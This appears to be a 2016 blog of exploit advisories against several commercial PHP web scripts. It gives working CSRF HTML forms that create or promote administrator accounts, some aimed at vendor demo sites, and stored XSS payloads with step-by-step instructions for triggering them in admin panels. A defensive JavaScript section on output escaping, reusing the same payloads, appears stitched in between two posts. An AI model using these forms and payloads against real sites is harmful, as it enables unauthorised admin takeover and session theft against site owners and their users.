Monday, 27 June 2016

Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit

05:37 Posted by Unknown
<!--
# Exploit Title: Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://codecanyon.net/item/twitter-auto-post-multi-accounts/16794863?s_rank=1
# Demo Page: http://tw.cozola.com/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/index.php/Users/postUpdate" method="POST">
      <input type="hidden" name="admin" value="1" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="username" value="newadmin" />
      <input type="hidden" name="password" value="newpass" />
      <input type="hidden" name="repassword" value="newpass" />
      <input type="hidden" name="fid" value="hacked&#95;admin" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="token" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->

Monday, 13 June 2016

PaidVids - Multiple Vulnerabilities

11:38 Posted by Unknown
# Exploit Title: PaidVids - Multiple Vulnerabilities
# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://paidtasks.net/
# Demo Page: http://video.paidtasks.net/admin-panel/
# Version: 1.0


###########################

# CSRF Add Admin Exploit:

< -- bug code started -- >

<html>
  <body>
    <form action="http://video.paidtasks.net/admin-panel/index.php?x=users&edit=7" method="POST">
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="email" value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="pass" value="" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="country" value="82" />
      <input type="hidden" name="coins" value="0&#46;20" />
      <input type="hidden" name="admin" value="1" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

< -- end of the bug code -- >

###########################


# Stored XSS Vulnerability:

PaidVids is vulnerable to stored XSS when a user is edited with a malicious payload in the username field. The JavaScript payload executes when another admin or editor opens the
"All Members" section in the left bar.

# How To Exploit:

Go to the admin panel and edit an existing user. Change the "username" to:
"><img src="c" onerror="alert(document.cookie)">
After this, go to the members page. Here is your alert.

PoC: http://prntscr.com/bew0df

###########################

Lara-Blog Stored XSS Vulnerability

11:38 Posted by Unknown
# Exploit Title: Lara-Blog Stored XSS Vulnerability
# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://xcoder.io/demo/
# Demo Page: http://xcoder.io/demo/lara-blog/dashboard
# Version: 1.0

#########################

1. Vulnerability Summary:

Lara-Blog is vulnerable to stored XSS when a user is created with a malicious payload in the Full name field.
The JavaScript payload executes when another admin or editor opens the
"Users" section in the left bar.

2. How to exploit:

Go to the admin panel and create a new user or edit an existing user. Change the "Full name" to:
"><img src="c" onerror="alert(document.cookie)">
After this, go to the "Users" section or the "Dashboard". Here is your alert.

PoC: http://prntscr.com/bevbyh


3. Vulnerable Versions:

All versions of Lara-Blog are vulnerable to this bug.

#########################

Mass Mailer - Stored XSS Vuln.

11:38 Posted by Unknown
# Exploit Title: Mass Mailer Stored XSS Vuln.
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.brightery.com.eg/
# Demo Page: http://demo.brightery.com.eg/mass-mailer
# Version: 1.0

# Exploit:

< -- bug code started -- >

Go to the admin page. Add a server from the top right menu. Use the payload: '"><svg/onload=confirm(document.domain)>

And go to http://[SITE]/[script_path]/admin/servers

Here is your alert!

< -- end of the bug code -- >
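The three stored XSS reports above (PaidVids username, Lara-Blog Full name, Mass Mailer server name) share one root cause: a stored, user-controlled string is written into the admin listing as raw markup. The following is an added example, not code from the advisories or from any of the affected products; the row layout, the user objects and the `SAMPLE_USERS` records are assumptions, with the sample names taken from the payloads quoted above. It shows the vulnerable concatenation next to the output-encoded version, plus a small check that reports any tag in the rendered HTML that did not come from the template.

```javascript
// Added example, not code from the advisories or the affected products:
// rendering user-controlled profile fields (username, full name, server
// name) into an admin listing. The row layout and user objects are assumed.

// Escape for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored value is concatenated straight into markup,
// so a value that closes the attribute/tag and opens a new one is rendered
// as markup whenever an admin views the list.
function renderUserRowUnsafe(user) {
  return `<tr data-name="${user.name}"><td>${user.id}</td><td>${user.name}</td></tr>`;
}

// Hardened pattern: every untrusted value is escaped at output time, in the
// context it is placed in. Input validation is a useful extra, but output
// encoding is what keeps the listing safe regardless of what was stored.
function renderUserRowSafe(user) {
  const name = escapeHtml(user.name);
  return `<tr data-name="${name}"><td>${escapeHtml(user.id)}</td><td>${name}</td></tr>`;
}

// Review/test helper: list tag names in the rendered HTML that are not part
// of the template. Any extra tag means stored data became markup.
const TEMPLATE_TAGS = new Set(["tr", "/tr", "td", "/td"]);
function foreignTags(html) {
  const found = [];
  const re = /<\s*(\/?[a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (!TEMPLATE_TAGS.has(tag)) found.push(tag);
  }
  return found;
}

// Constructed sample records using the payloads quoted in the advisories.
const SAMPLE_USERS = [
  { id: 7, name: '"><img src="c" onerror="alert(document.cookie)">' },
  { id: 8, name: "'\"><svg/onload=confirm(document.domain)>" },
  { id: 9, name: "ordinary user" },
];

// For each record: which foreign tags appear in the unsafe and safe output.
function demoXss() {
  return SAMPLE_USERS.map((u) => ({
    id: u.id,
    unsafe: foreignTags(renderUserRowUnsafe(u)),
    safe: foreignTags(renderUserRowSafe(u)),
  }));
}

console.log(JSON.stringify(demoXss()));
// [{"id":7,"unsafe":["img","img"],"safe":[]},{"id":8,"unsafe":["svg","svg"],"safe":[]},{"id":9,"unsafe":[],"safe":[]}]
```

The `foreignTags` check is deliberately crude: it is a regression test for a template, not an HTML parser, and it only catches markup injected into an HTML body or attribute context. Values placed inside `<script>` blocks, URLs or event handlers need their own context-specific encoding, and a Content-Security-Policy without `unsafe-inline` limits what an injected `onerror`/`onload` handler can do even when encoding is missed.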

#########################

Sunday, 12 June 2016

Mobiketa 1.0 - CSRF Add Admin Exploit

08:39 Posted by Unknown
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email" value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->